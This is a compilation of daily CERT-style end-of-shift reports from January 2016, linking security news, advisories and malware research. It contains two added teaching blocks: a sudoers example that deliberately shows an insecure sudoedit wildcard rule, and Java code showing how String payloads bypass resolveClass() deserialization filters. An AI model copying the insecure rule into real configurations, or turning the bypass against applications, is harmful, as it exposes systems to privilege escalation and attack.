---------------------------------------------
Whether they encourage it or not, some network operators become known and favored by criminals such as those that operate exploit kit (EK) and malware infrastructure. After ..
---------------------------------------------
http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.h…
*** MS16-JAN - Microsoft Security Bulletin Summary for January 2016 - Version: 1.0 ***
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/MS16-JAN
*** Raising the Dead ***
---------------------------------------------
It's a bit late for Halloween but the ability to resurrect the dead (processes that is) is an interesting type of security issue when dealing with multi-user Windows systems such as Terminal Servers. Specifically this blog is about this issue which I reported to Microsoft and was fixed in bulletin ..
---------------------------------------------
http://googleprojectzero.blogspot.com/2016/01/raising-dead.html
*** FortiOS SSH Undocumented Interactive Login Vulnerability ***
---------------------------------------------
http://www.fortiguard.com/advisory/fortios-ssh-undocumented-interactive-log…
*** Ransomware Strikes Websites ***
---------------------------------------------
Ransomware is one of the most insidious types of malware that one can come across. These infections will encrypt all files on the target computer as well as any hard drives connected to the machine - pictures, videos, text files - you ..
---------------------------------------------
https://blog.sucuri.net/2016/01/ransomware-strikes-websites.html
*** Triaging the exploitability of IE/EDGE crashes ***
---------------------------------------------
Both Internet Explorer (IE) and Edge have seen significant changes in order to help protect customers from security threats. This work has featured a number of mitigations that together have not only rendered classes of vulnerabilities non-exploitable, but also dramatically raised the cost ..
---------------------------------------------
http://blogs.technet.com/b/srd/archive/2016/01/12/triaging-the-exploitabili…
*** The smart doorbell gives away the WLAN password ***
---------------------------------------------
An intercom that works together with a smartphone. Sounds practical, but unfortunately the device has security flaws, as hackers have now found out.
---------------------------------------------
http://www.golem.de/news/internet-of-things-die-smarte-tuerklingel-verraet-…
*** Backdoor suspected at Fortinet: company speaks of a vulnerability ***
---------------------------------------------
Alternative login method discovered in software - patch already released in 2014
---------------------------------------------
http://derstandard.at/2000028972976
*** A Case of Too Much Information: Ransomware Code Shared Publicly for 'Educational Purposes', Used Maliciously Anyway ***
---------------------------------------------
Researchers, whether independent or from security vendors, have a responsibility to properly disseminate the information they gathered to help the industry as well as users. Even with the best intentions, improper disclosure of sensitive information ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/a-case-of-too-mu…
*** Security: Verizon routes 4 million spammer IPs ***
---------------------------------------------
IPv4 addresses are a scarce resource. Yet the US provider Verizon reportedly still does not respond to abuse reports, a security firm criticises.
---------------------------------------------
http://www.golem.de/news/security-verizon-routet-4-millionen-spammer-ips-16…
*** [HTB23279]: Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module ***
---------------------------------------------
High-Tech Bridge Security Research Lab discovered multiple SQL Injection vulnerabilities in the mcart.xls Bitrix module, which can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in the database and gain complete control over the vulnerable website.
---------------------------------------------
https://www.htbridge.com/advisory/HTB23279
*** [HTB23283]: Remote Code Execution in Roundcube ***
---------------------------------------------
High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in the popular webmail client Roundcube. The vulnerability can be exploited to gain access to sensitive information and, under certain circumstances, to execute arbitrary code and totally compromise the vulnerable server.
---------------------------------------------
https://www.htbridge.com/advisory/HTB23283
*** Hacking Team's Leak Helped Researchers Hunt Down a Zero-Day ***
---------------------------------------------
Researchers at Kaspersky Lab have, for the first time, discovered a valuable zero-day exploit after intentionally going on the hunt for it.
---------------------------------------------
http://www.wired.com/2016/01/hacking-team-leak-helps-kaspersky-researchers-…
*** Denial-of-Service Flaw Patched in DHCP ***
---------------------------------------------
The Internet Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP.
---------------------------------------------
http://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/
*** The SLOTH attack and IKE/IPsec ***
---------------------------------------------
Executive Summary: The IKE daemons in RHEL7 (libreswan) and RHEL6 (openswan) are not vulnerable to the SLOTH attack, but the attack is still interesting to look at. The SLOTH attack released today is a new transcript collision attack against ..
---------------------------------------------
https://securityblog.redhat.com/2016/01/13/the-sloth-attack-and-ikeipsec/
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 11-01-2016 18:00 - Tuesday 12-01-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Angler Exploit Kit Continues to Evade Detection: Over 90,000 Websites Compromised ***
---------------------------------------------
Exploit Kits (EK), arguably the most impactful malicious infrastructure on the Internet, constantly evolve to evade detection by security technology. Tremendous effort has been spent on tracking new variations of different EK families. In ..
---------------------------------------------
http://researchcenter.paloaltonetworks.com/2016/01/angler-exploit-kit-conti…
*** Mac OS X, iOS, and Flash Had the Most Discovered Vulnerabilities in 2015 ***
---------------------------------------------
Interesting analysis: Which software had the most publicly disclosed vulnerabilities this year? The winner is none other than Apple's Mac OS X, with 384 vulnerabilities. The runner-up? Apple's iOS, with 375 vulnerabilities. Rounding out the top five are Adobe's Flash Player, with 314 vulnerabilities; Adobe's AIR ..
---------------------------------------------
https://www.schneier.com/blog/archives/2016/01/mac_os_x_ios_an.html
*** DSA-3440 sudo - security update ***
---------------------------------------------
When sudo is configured to allow a user to edit files under a directory that they can already write to without using sudo, they can actually edit (read and write) arbitrary files. Daniel Svartman reported that a configuration like this might ..
---------------------------------------------
https://www.debian.org/security/2016/dsa-3440
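As an added illustration (not taken from the Debian advisory), here is a sudoers rule of the kind DSA-3440 describes next to a safer alternative. The user name and paths are assumed for the example. The risk comes from the wildcard under a directory the user already owns: sudoedit runs with root privileges, and a symlink the user plants inside that directory lets the rule reach any file on the system.

```text
# Risky: sudoedit on a wildcard path inside a directory alice can write to herself.
# alice can create /home/alice/notes.txt as a symlink to /etc/shadow; sudoedit then
# opens the target as root, so she reads and writes arbitrary files.
alice ALL=(root) sudoedit /home/alice/*

# Safer: grant sudoedit only on named files that live in directories alice cannot
# write to, so no component of the path is under her control.
alice ALL=(root) sudoedit /etc/myapp/config.ini
```

Review the output of `sudo -l` for the affected user after changing the rule, and install the sudo update shipped with DSA-3440 so that the remaining sudoedit rules no longer follow symlinks in user-writable path components.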
*** Ransom32 - look at the malicious package ***
---------------------------------------------
Ransom32 is a new ransomware implemented in a very atypical style. In our post, we will focus on some implementation details of the malicious package.
---------------------------------------------
https://blog.malwarebytes.org/intelligence/2016/01/ransom32-look-at-the-mal…
*** Say 'Cyber' again - Ars cringes through CSI: Cyber ***
---------------------------------------------
CBS endangered cyber-procedural: Plane hacking! Software defined radio! White noise! OMG!
---------------------------------------------
http://arstechnica.com/the-multiverse/2016/01/say-cyber-again-ars-cringes-t…
*** McAfee Application Control - The dinosaurs want their vuln back ***
---------------------------------------------
The experts of the SEC Consult Vulnerability Lab conducted research in the field of the security of application whitelisting in critical infrastructures. In the course of that research the security of McAfee Application Control was checked. The experts developed several methods to bypass the provided protections ..
---------------------------------------------
http://blog.sec-consult.com/2016/01/mcafee-application-control-dinosaurs.ht…
*** (ISC)2 SecureAustria ***
---------------------------------------------
How can we know what we are protecting if we struggle to understand and keep up with how we and our organizations are changing? It's time to get a grip on the far-reaching and fundamental changes that are occurring in business today.
---------------------------------------------
https://www.sba-research.org/events/isc2-secureaustria/
*** Security: end of support for old IE versions hits one in five web users ***
---------------------------------------------
Over the years Microsoft has released a wealth of different versions of Internet Explorer. Now it is shedding its support obligations for a large part of them: effective immediately, Microsoft no longer ships any updates for Internet Explorer 8 through 10.
---------------------------------------------
http://derstandard.at/2000028882047
*** Cops Say They Can Access Encrypted Emails on So-Called PGP BlackBerrys ***
---------------------------------------------
Dutch investigators have confirmed to Motherboard that they are able to read encrypted messages sent on PGP BlackBerry phones: custom, security-focused BlackBerry devices that come complete with an encrypted email feature, and which reportedly may be used by organized criminal groups.
---------------------------------------------
https://motherboard.vice.com/read/cops-say-they-can-access-encrypted-emails…
*** Ongoing Sophisticated Malware Campaign Compromising ICS (Update C) ***
---------------------------------------------
This alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-281-01B Ongoing Sophisticated Malware Campaign Compromising ICS that was published December 10, 2014, on the ICS-CERT web site. | ICS-CERT has identified a sophisticated malware campaign that has compromised numerous ..
---------------------------------------------
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-281-01B
*** Experts warn Neutrino and RIG exploit kit activity spike ***
---------------------------------------------
Security experts at Heimdal Security are warning of a spike in cyber attacks leveraging the popular Neutrino and RIG exploit kits. Cyber criminals always exploit new opportunities and users' bad habits; now the crooks behind the recent campaigns relying on Neutrino and RIG exploit kits are ramping up attacks ..
---------------------------------------------
http://securityaffairs.co/wordpress/43482/cyber-crime/neutrino-rig-exploit-…
*** Group using DDoS attacks to extort business gets hit by European law enforcement ***
---------------------------------------------
On 15 and 16 December, law enforcement agencies from Austria, Bosnia and Herzegovina, Germany and the United Kingdom joined forces with Europol in the framework of an operation against the ...
---------------------------------------------
http://www.net-security.org/secworld.php?id=19314
*** Serious security holes in Trend Micro's password manager ***
---------------------------------------------
Google researcher Tavis Ormandy once again uncovers vulnerabilities in anti-virus software. At Trend Micro he notes with dismay: "The most ridiculous thing I've ever seen."
---------------------------------------------
http://heise.de/-3069140
*** UPC: default Wi-Fi passwords trivially easy to crack ***
---------------------------------------------
A new hack allows the password to be computed from the ESSID; UPC is considering legal action against the security researcher.
---------------------------------------------
http://derstandard.at/2000028921659
*** An Easy Way for Hackers to Remotely Burn Industrial Motors ***
---------------------------------------------
Devices that control the speed of industrial motors operating water plant pumps and other equipment can be remotely hacked and destroyed.
---------------------------------------------
http://www.wired.com/2016/01/an-easy-way-for-hackers-to-remotely-burn-indus…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 08-01-2016 18:00 - Monday 11-01-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** GM Asks Friendly Hackers to Report Its Cars' Security Flaws ***
---------------------------------------------
The auto giant becomes the first in Detroit to extend an olive branch to car hackers.
---------------------------------------------
http://www.wired.com/2016/01/gm-asks-friendly-hackers-to-report-its-cars-se…
*** STIX - Looking at a Campaign, Part 1 ***
---------------------------------------------
Now we come to a useful application of STIX: characterizing a campaign.
---------------------------------------------
http://www.scmagazine.com/stix--looking-at-a-campaign-part-1/article/464093/
*** ZDI-16-007: McAfee Application Control Kernel Driver Memory Corruption Privilege Escalation Vulnerability ***
---------------------------------------------
This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of McAfee Application Control. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-16-007/
*** Advancing the Security of Juniper Products ***
---------------------------------------------
Bob Worrall, SVP and Chief Information Officer, provides more detail on the ScreenOS investigation and the security steps being taken with Junos and across Juniper.
---------------------------------------------
http://forums.juniper.net/t5/Security-Incident-Response/Advancing-the-Secur…
*** Virtual Bitlocker Containers, (Sat, Jan 9th) ***
---------------------------------------------
This week, I got an interesting question from a customer: "What do you recommend to safely store files in a directory on my laptop?" There are plenty of ways to achieve this, the right choice depending on the encryption reliability, the ease of use and ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20593
*** MMD-0049-2016 - A case of java trojan (downloader/RCE) for remote minerd hack ***
---------------------------------------------
This is a short post for supporting the takedown purpose. Warning: Sorry, there's nothing fancy nor "in-depth analysis" in here :-) The scheme is so bad, so I think it's best for all to know for mitigation and hardening purpose. In this case, a bad actor was ..
---------------------------------------------
http://blog.malwaremustdie.org/2016/01/mmd-0049-2016-case-of-java-trojan.ht…
*** Study: SMEs underestimate the threat of cyber crime ***
---------------------------------------------
Losses are rising, awareness of IT security is not: according to a study, mid-sized companies protect themselves only inadequately against IT attacks, even though legislators have long obliged them to act.
---------------------------------------------
http://heise.de/-3067640
*** January update: Google closes critical holes in Android ***
---------------------------------------------
Google seems to have found its security update rhythm, at least where its own devices are concerned. Google is currently rolling out the January update for Android to the smartphones and tablets of the Nexus line.
---------------------------------------------
http://derstandard.at/2000028786638
*** NSA espionage allegations: Juniper promises further updates ***
---------------------------------------------
The random number generator introduced by the US intelligence agency is being removed from the network operating system
---------------------------------------------
http://derstandard.at/2000028789875
*** A Look Inside Cybercriminal Call Centers ***
---------------------------------------------
Crooks who make a living via identity theft schemes, dating scams and other con games often run into trouble when presented with a phone-based challenge that requires them to demonstrate mastery of a language they don't speak fluently. Enter the ..
---------------------------------------------
http://krebsonsecurity.com/2016/01/a-look-inside-cybercriminal-call-centers/
*** Android: malware from the Play Store installed hundreds of thousands of times ***
---------------------------------------------
When it comes to Android malware, the advice to users is usually quite simple: anyone who refrains from installing apps from untrusted sources is normally not at risk. But in a current case attackers have managed to trick the Play Store's security checks.
---------------------------------------------
http://derstandard.at/2000028774967
*** Hacker attack on data centre operator Interxion ***
---------------------------------------------
In December there was a break-in into the company's own CRM system
---------------------------------------------
http://derstandard.at/2000028816801
*** Click fraud: under the cover of the cookie warning ***
---------------------------------------------
Online crooks are quite literally hiding behind cookie warnings and collecting clicks on advertisements that way.
---------------------------------------------
http://heise.de/-3067995
*** OAuth2 & OpenID - HTTPS Bicycle Attack ***
---------------------------------------------
The OAuth 2.0 protocol allows users to grant relying parties access to resources at identity providers. In addition to being used for this kind of authorization, OAuth is also often employed for authentication in single sign-on (SSO) systems. OAuth 2.0 is, in fact, one of the most widely used ..
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016010064
*** PHP updates across all versions fix several security problems ***
---------------------------------------------
The makers of the scripting language recommend that users of PHP 7.0, 5.5 and 5.6 install the current security releases. At the same time, a look at GitHub and the PHP wiki gives a preview of upcoming features in PHP 7.1.
---------------------------------------------
http://heise.de/-3068170
*** DSA-3438 xscreensaver - security update ***
---------------------------------------------
It was discovered that unplugging one of the monitors in a multi-monitor setup can cause xscreensaver to crash. Someone with physical access to a machine could use this problem to bypass a locked session.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3438
*** Unencrypted CMS updates: Drupal vows to do better ***
---------------------------------------------
The update mechanism of the popular content management system Drupal delivers updates unencrypted. A problem that has been known for years and can be abused by attackers to hijack sites.
---------------------------------------------
http://heise.de/-3068105
*** About CVE-2015-8518: SAP Adaptive Server Enterprise Extended Stored Procedure Unauthorized Invocation ***
---------------------------------------------
SAP released an update for SAP ASE 16.0 and 15.7 that addresses a serious security flaw discovered by Martin Rakhmanov, lead security researcher at Trustwave, that has been around for a long time. Suppose there is a user joe in...
---------------------------------------------
http://trustwave.com/Resources/SpiderLabs-Blog/About-CVE-2015-8518--SAP-Ada…
*** How Nvidia breaks Chrome Incognito ***
---------------------------------------------
When I launched Diablo III, I didn't expect the pornography I had been looking at hours previously to be splashed on the screen. But that's exactly what replaced the black loading screen. Like a scene from Hollywood, the game temporarily froze as it launched, preventing any attempt to clear the screen. The game unfroze just before clearing the screen, and I was able to grab a screenshot (censored with bright red):
---------------------------------------------
https://charliehorse55.wordpress.com/2016/01/09/how-nvidia-breaks-chrome-in…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 07-01-2016 18:00 - Friday 08-01-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Upcoming Security Updates for Adobe Acrobat and Reader (APSB16-02) ***
---------------------------------------------
A prenotification Security Advisory (APSB16-02) has been posted regarding upcoming updates for Adobe Acrobat and Reader scheduled for Tuesday, January 12, 2016. We will continue to provide updates on the upcoming release via the Security Advisory as well as the...
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1308
*** Android-powered smart TVs targeted by malicious apps ***
---------------------------------------------
Smart TVs running older versions of Android are being targeted by several websites offering apps containing malware, according to Trend Micro. The security vendor wrote on Thursday that it found a handful of app websites targeting people in the U.S. and Canada by offering the malicious apps. The apps are exploiting a flaw in Android that dates to 2014, showing that many smart TVs do not have the latest patches. "Most smart TVs today use older versions of Android, which still contain this...
---------------------------------------------
http://www.cio.com/article/3020357/android-powered-smart-tvs-targeted-by-ma…
*** Good news, OAuth is almost secure ***
---------------------------------------------
Boffins turn up a couple of protocol vulns in Facebook's login standard. German boffins believe there are protocol flaws in Facebook's ubiquitous OAuth protocol that render it vulnerable to attack.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/08/good_news_o…
*** Line hijacking through a serious vulnerability at o2 ***
---------------------------------------------
For over a year o2 has been trying to close a vulnerability in its DSL network through which other people's VoIP lines can be hijacked. So far this has only partly succeeded.
---------------------------------------------
http://heise.de/-3066225
*** Checkpoint chaps hack whacks air-gaps flat ***
---------------------------------------------
Bought a shiny IP KVM? Uh-oh. At 32c3, Check Point malware men Yaniv Balmas and Lior Oppenheim presented an air gap-hopping malware system that can quietly infect, plunder, and maintain persistence on networked and physically separated computers.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/08/checkpoint_…
*** Streaming dongle EZCast opens a back door into the home network ***
---------------------------------------------
Security researchers have discovered vulnerabilities in the EZCast HDMI dongle. Through them, attackers can gain access to the user's home network, regardless of how well the network is otherwise protected.
---------------------------------------------
http://heise.de/-3066210
*** Security patches: VMware stops privilege escalation ***
---------------------------------------------
VMware is patching its ESXi, Fusion, Player and Workstation products. The fixed versions are available for Linux, OS X and Windows. However, only Windows appears to be threatened by the vulnerability.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Sicherheitspatches-VMware-unterbinde…
*** Blocking Shodan isnt some sort of magical fix that will protect your data ***
---------------------------------------------
Earlier this week, a threat alert from Check Point singled out Shodan as a risk to enterprise operations. The advisory warns Check Point customers about the service, highlighting some of the instances where sensitive data was exposed to the public because Shodan indexed it. When asked about the advisory [archive], Ron Davidson, Head of Threat Intelligence and Research at Check Point, said the company was seeing an increase in the variety and frequency of suspect scans, "including scanners...
---------------------------------------------
http://www.csoonline.com/article/3020108/techology-business/blocking-shodan…
*** Apple fixes serious QuickTime security holes for Windows ***
---------------------------------------------
Attackers can inject malicious code with the help of a manipulated video file, Apple explains. The update fixes the vulnerabilities on Windows 7 and Vista.
---------------------------------------------
http://heise.de/-3067145
*** Cracking Damn Insecure and Vulnerable App (DIVA) - Part 2: ***
---------------------------------------------
In the previous article, we have seen the solutions for the first two challenges. In this article we will discuss the insecure data storage vulnerabilities in DIVA.
---------------------------------------------
http://resources.infosecinstitute.com/cracking-damn-insecure-and-vulnerable…
*** rt-sa-2015-005 ***
---------------------------------------------
o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials
---------------------------------------------
https://www.redteam-pentesting.de/advisories/rt-sa-2015-005.txt
*** VMSA-2016-0001 ***
---------------------------------------------
VMware ESXi, Fusion, Player, and Workstation updates address important guest privilege escalation vulnerability
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2016-0001.html
*** PHP Bugs May Let Remote Users Obtain Potentially Sensitive Information, Gain Elevated Privileges, or Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1034608
*** APPLE-SA-2016-01-07-1 QuickTime 7.7.9 ***
---------------------------------------------
APPLE-SA-2016-01-07-1 QuickTime 7.7.9 [Re-sending with a valid signature]. QuickTime 7.7.9 is now available and addresses the following: QuickTime. Available for: Windows 7 and Windows Vista. Impact: Viewing a maliciously crafted movie file may lead to an [...]
---------------------------------------------
http://prod.lists.apple.com/archives/security-announce/2016/Jan/msg00001.ht…
*** DFN-CERT-2016-0001: Mozilla Firefox, Network Security Services, OpenSSL, GnuTLS: A vulnerability allows bypassing security measures ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0001/
*** USN-2865-1: GnuTLS vulnerability ***
---------------------------------------------
Ubuntu Security Notice USN-2865-1, 8th January, 2016. gnutls26, gnutls28 vulnerability. A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.04, Ubuntu 14.04 LTS, Ubuntu 12.04 LTS. Summary: GnuTLS could be made to expose sensitive information over the network. Software description: gnutls26 - GNU TLS library; gnutls28 - GNU TLS library. Details: Karthikeyan Bhargavan and Gaetan Leurent discovered that GnuTLS incorrectly allowed MD5 to be used for TLS 1.2 connections. If a remote...
---------------------------------------------
http://www.ubuntu.com/usn/usn-2865-1/
*** Bugtraq: [security bulletin] HPSBUX03435 SSRT102977 rev.1 - HP-UX Web Server Suite running Apache, Remote Denial of Service (DoS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537254
*** Security Advisory: Privilege escalation vulnerability CVE-2015-7393 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/75/sol75136237.html?…
*** Security Advisory: BIG-IP AOM password sync vulnerability CVE-2015-8611 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/05/sol05272632.html?…
*** Security Advisory: F5 Path MTU Discovery vulnerability CVE-2015-7759 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/22/sol22843911.html?…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 05-01-2016 18:00 - Thursday 07-01-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Starting Tuesday: end of Internet Explorer 8, 9 and 10 ***
---------------------------------------------
Microsoft is ending support for the outdated Internet Explorer versions 8, 9 and 10 as of 12 January. They will no longer receive any updates.
---------------------------------------------
http://futurezone.at/produkte/ab-dienstag-aus-fuer-internet-explorer-8-9-un…
https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support
*** Site Updates: ISC/DShield API and ipinfo_ascii.html Page, (Wed, Jan 6th) ***
---------------------------------------------
We are planning a couple of updates to the ways data can be retrieved automatically from this site. The main reason for this is to make it easier for us to maintain and support some of these features. The main idea will be that we focus automatic data retrieval to our API (isc.sans.edu/api or dshield.org/api). It should be the only place that is used to have scripts retrieve data. In the past, we had a couple of other pages that supported automatic data retrieval. For example, ipinfo_ascii.html...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20577&rss
*** How long is your password? HTTPS Bicycle attack reveals that and more ***
---------------------------------------------
Get your 2FA on, slackers. A new attack on supposedly secure communication streams raises questions over the resilience of passwords, security researchers warn.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/06/https_bicyc…
*** Mozilla warns Firefox fans its SHA-1 ban could bork their security ***
---------------------------------------------
Protection mechanism screws other protection mechanisms. What a tangled web we weave. Mozilla has warned Firefox users they may be cut off from more of the web than expected, now that the browser rejects new HTTPS certificates that use the weak SHA-1 algorithm.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/07/mozilla_war…
https://blog.mozilla.org/security/2016/01/06/man-in-the-middle-interfering-…
*** MD5/SHA1: SLOTH attacks exploit old hash algorithms ***
---------------------------------------------
New attacks against TLS: with SLOTH, crypto researchers present several weaknesses in TLS implementations and in the protocol itself. The most critical is an attack on client authentication with RSA and MD5.
---------------------------------------------
http://www.golem.de/news/md5-sha1-sloth-angriffe-nutzen-alte-hash-algorithm…
*** Encrypted Blackphone Patches Serious Modem Flaw ***
---------------------------------------------
msm1267 writes: Silent Circle, makers of the security and privacy focused Blackphone, have patched a vulnerability that could allow a malicious mobile application or remote attacker to access the device's modem and perform any number of actions. Researchers at SentinelOne discovered an open socket on the Blackphone that an attacker could abuse to intercept calls, set call forwarding, read SMS messages, mute the phone and more. Blackphone is marketed toward privacy-conscious users; it includes...
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/ocmLGjQf8XY/encrypted-black…
*** OS-X-Security-and-Privacy-Guide ***
---------------------------------------------
This is a collection of thoughts on securing a modern Apple Mac computer using OS X 10.11 "El Capitan", as well as steps to improving online privacy. This guide is targeted to "power users" who wish to adopt enterprise-standard security, but is also suitable for novice users with an interest in improving their privacy and security on a Mac.
---------------------------------------------
https://github.com/drduh/OS-X-Security-and-Privacy-Guide
*** Drupal - Insecure Update Process ***
---------------------------------------------
Just a few days after installing Drupal v7.39, I noticed there was a security update available: Drupal v7.41. This new version fixes an open redirect in the Drupal core. In spite of my Drupal update process checking for updates, according to my local instance, everything was up to date: Issue #1: Whenever the Drupal update process fails, Drupal states that everything is up to date instead of giving a warning.
---------------------------------------------
http://blog.ioactive.com/2016/01/drupal-insecure-update-process.html
*** Install the update now: WordPress fixes XSS hole ***
---------------------------------------------
Attackers can compromise WordPress installations through a cross-site scripting vulnerability. All versions up to and including WordPress 4.4 are affected.
---------------------------------------------
http://heise.de/-3065193
https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance…
*** AVM routers: FRITZ!Box hole allows phone calls at someone else's expense ***
---------------------------------------------
Through a critical hole in the FRITZ!Box routers, attackers can, for instance, make phone calls on someone else's bill and execute code as root. AVM has already closed the hole, but the details were kept under wraps until today.
---------------------------------------------
http://heise.de/-3065588
*** A new, open source tool proves: Even after patching, deserializing will still kill you ***
---------------------------------------------
What's the problem here? ... When deserializing most objects, the code calls ObjectInputStream#resolveClass() as part of the process. This method is where all the patches and hardening against recent exploits take place. Because that method is never involved in deserializing Strings, anyone can use this to attack an application that's "fully patched" against the recent spate of attacks.
---------------------------------------------
https://www.contrastsecurity.com/security-influencers/java-deserializing-op…
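The mechanism described above can be observed directly. The following is an added example, not code from the Contrast Security post or its tool: a "look-ahead" ObjectInputStream of the kind used to harden applications after the 2015 deserialization exploits, with a counter in resolveClass(). The class allow-list and the sample payloads (an empty ArrayList, a bare String, a HashMap) are constructed for this example. Reading the ArrayList goes through resolveClass() once; reading the String never reaches it, because a String is written as TC_STRING without any class descriptor, so whatever checks live in resolveClass() do not see it.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.ArrayList;
import java.util.HashMap;

/**
 * Added example (not from the Contrast Security post): a look-ahead
 * ObjectInputStream that allow-lists classes in resolveClass(), plus a
 * counter showing that resolveClass() never runs for a serialized String.
 */
public class ResolveClassGap {

    /** Hardened stream: every class descriptor in the stream must pass the allow-list. */
    static class LookAheadObjectInputStream extends ObjectInputStream {
        int resolveCalls = 0;

        LookAheadObjectInputStream(InputStream in) throws IOException {
            super(in);
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            resolveCalls++;
            // Hypothetical allow-list for this example: only ArrayList may be restored.
            if (!"java.util.ArrayList".equals(desc.getName())) {
                throw new InvalidClassException("class not allowed: " + desc.getName());
            }
            return super.resolveClass(desc);
        }
    }

    /** Standard Java serialization of an object into a byte array. */
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    /** Deserializes the payload through the hardened stream and reports how often resolveClass() ran. */
    static int resolveCallsFor(byte[] payload) throws IOException, ClassNotFoundException {
        try (LookAheadObjectInputStream ois =
                 new LookAheadObjectInputStream(new ByteArrayInputStream(payload))) {
            ois.readObject();
            return ois.resolveCalls;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed payloads: an empty ArrayList carries one class descriptor,
        // a bare String carries none, and a HashMap is rejected by the allow-list.
        System.out.println("ArrayList: resolveClass() calls = "
                + resolveCallsFor(serialize(new ArrayList<>())));   // 1
        System.out.println("String:    resolveClass() calls = "
                + resolveCallsFor(serialize("just a string")));     // 0
        try {
            resolveCallsFor(serialize(new HashMap<>()));
        } catch (InvalidClassException e) {
            System.out.println("HashMap:   rejected by resolveClass(): " + e.getMessage());
        }
    }
}
```

Compile and run with `javac ResolveClassGap.java && java ResolveClassGap`. The ArrayList is the happy path, the HashMap shows the allow-list doing its job, and the String shows the gap: any filtering that lives only in resolveClass() is blind to String payloads, so length limits or other checks on string data have to be enforced elsewhere in the stream handling.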
*** rt-sa-2015-001 ***
---------------------------------------------
AVM FRITZ!Box: Remote Code Execution via Buffer Overflow
---------------------------------------------
https://www.redteam-pentesting.de/advisories/rt-sa-2015-001.txt
*** rt-sa-2014-014 ***
---------------------------------------------
AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images
---------------------------------------------
https://www.redteam-pentesting.de/advisories/rt-sa-2014-014.txt
*** Bugtraq: [SYSS-2015-062] ownCloud Information Exposure Through Directory Listing (CVE-2016-1499) ***
---------------------------------------------
[SYSS-2015-062] ownCloud Information Exposure Through Directory Listing (CVE-2016-1499)
---------------------------------------------
http://www.securityfocus.com/archive/1/537244
*** DFN-CERT-2016-0023: Node.js-WS: A vulnerability allows information disclosure ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0023/
*** DFN-CERT-2016-0028: Shotwell: A vulnerability allows bypassing security measures ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0028/
*** DFN-CERT-2016-0004: Mozilla Thunderbird, Debian Icedove: Multiple vulnerabilities allow, among other things, the execution of arbitrary code ***
---------------------------------------------
Version 3 (2016-01-05 17:52) | Debian provides security updates to Icedove version 38.5.0 for the distributions Wheezy (old stable), Jessie (stable) and Stretch (testing). The vulnerabilities CVE-2015-7210 and CVE-2015-7222 are not addressed by these updates.
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0004/
*** Security Advisory: QEMU vulnerability CVE-2012-3515 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/13/sol13405416.html?…
*** Security Advisory: Out-of-bounds memory vulnerability with the BIG-IP APM system CVE-2015-8098 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/43/sol43552605.html?…
*** DSA-3435 git - security update ***
---------------------------------------------
Blake Burkhart discovered that the Git git-remote-ext helper incorrectly handled recursive clones of git repositories. A remote attacker could possibly use this issue to execute arbitrary code by injecting commands via crafted URLs.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3435
*** Advantech EKI Vulnerabilities (Update B) ***
---------------------------------------------
